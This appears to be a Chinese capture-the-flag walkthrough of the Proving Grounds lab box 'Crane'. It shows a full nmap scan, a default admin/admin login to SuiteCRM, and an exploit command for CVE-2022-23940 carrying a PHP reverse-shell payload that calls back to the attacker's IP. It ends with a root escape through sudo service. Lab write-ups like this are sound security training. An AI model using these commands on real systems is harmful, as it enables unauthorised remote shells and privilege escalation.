PG_Crane

信息收集：

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.146
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-22 18:44 CST
Nmap scan report for 192.168.216.146
Host is up (0.0077s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
|   256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_  256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: SuiteCRM
|_Requested resource was index.php?action=Login&module=Users
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=2/22%Time=67B9AABA%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"x05x0bx08x05x1a")%r(GenericLines,9,"x05x0b
SF:x08x05x1a")%r(GetRequest,9,"x05x0bx08x05x1a")%r(HTTPOp
SF:tions,9,"x05x0bx08x05x1a")%r(RTSPRequest,9,"x05x0b
SF:x08x05x1a")%r(RPCCheck,9,"x05x0bx08x05x1a")%r(DNSVers
SF:ionBindReqTCP,9,"x05x0bx08x05x1a")%r(DNSStatusRequestTCP,2
SF:B,"x05x0bx08x05x1ax1ex01x08x01x10x88'x1ax0fI
SF:nvalidx20message"x05HY000")%r(Help,9,"x05x0bx08x05x1a")
SF:%r(SSLSessionReq,2B,"x05x0bx08x05x1ax1ex01x08x01
SF:x10x88'x1ax0fInvalidx20message"x05HY000")%r(TerminalServerCookie
SF:,9,"x05x0bx08x05x1a")%r(TLSSessionReq,2B,"x05x0bx
SF:08x05x1ax1ex01x08x01x10x88'x1ax0fInvalidx20message"
SF:x05HY000")%r(Kerberos,9,"x05x0bx08x05x1a")%r(SMBProgNeg,9
SF:,"x05x0bx08x05x1a")%r(X11Probe,2B,"x05x0bx08x05
SF:x1ax1ex01x08x01x10x88'x1ax0fInvalidx20message"x05HY0
SF:00")%r(FourOhFourRequest,9,"x05x0bx08x05x1a")%r(LPDString,
SF:9,"x05x0bx08x05x1a")%r(LDAPSearchReq,2B,"x05x0bx0
SF:8x05x1ax1ex01x08x01x10x88'x1ax0fInvalidx20message"
SF:x05HY000")%r(LDAPBindReq,46,"x05x0bx08x05x1ax009x01
SF:x08x01x10x88'x1a*Parsex20errorx20unserializingx20protobufx20me
SF:ssage"x05HY000")%r(SIPOptions,9,"x05x0bx08x05x1a")%r(LAN
SF:Desk-RC,9,"x05x0bx08x05x1a")%r(TerminalServer,9,"x05
SF:0x0bx08x05x1a")%r(NCP,9,"x05x0bx08x05x1a")%r(NotesRP
SF:C,2B,"x05x0bx08x05x1ax1ex01x08x01x10x88'x1ax
SF:0fInvalidx20message"x05HY000")%r(JavaRMI,9,"x05x0bx08x05x
SF:1a")%r(WMSRequest,9,"x05x0bx08x05x1a")%r(oracle-tns,32,"
SF:x05x0bx08x05x1a%x01x08x01x10x88'x1ax16Invalid
SF:x20message-frame."x05HY000")%r(ms-sql-s,9,"x05x0bx08x05x
SF:1a")%r(afp,2B,"x05x0bx08x05x1ax1ex01x08x01x10
SF:x88'x1ax0fInvalidx20message"x05HY000");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/22%OT=22%CT=1%CU=30644%PV=Y%DS=4%DC=T%G=Y%TM=67B9AAC
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1
OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT     ADDRESS
1   4.66 ms 192.168.45.1
2   4.66 ms 192.168.45.254
3   4.74 ms 192.168.251.1
4   4.91 ms 192.168.216.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds

开放了80的http端口，而且有robots.txt泄露

搜索exp，有一个能够RCE的漏洞，但是需要认证

尝试admin/admin登录成功

修改exp脚本内容

直接执行sh反弹shell失，估计是V*N的问题，检索漏洞CVE-2022-23940，换一个脚本

https://github.com/manuelz120/CVE-2022-23940

python3 exploit.py -h http://192.168.216.146/ -u admin -p admin --payload "php -r '$sock=fsockopen("192.168.45.184", 3000); exec("/bin/sh -i <&3 >&3 2>&3");'"

成功拿到shell

拿到local

常规信息收集

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null ;
sudo -l

sudo -l发现service可以sudo免密码执行

sudo /usr/sbin/service ../../bin/sh

拿到proof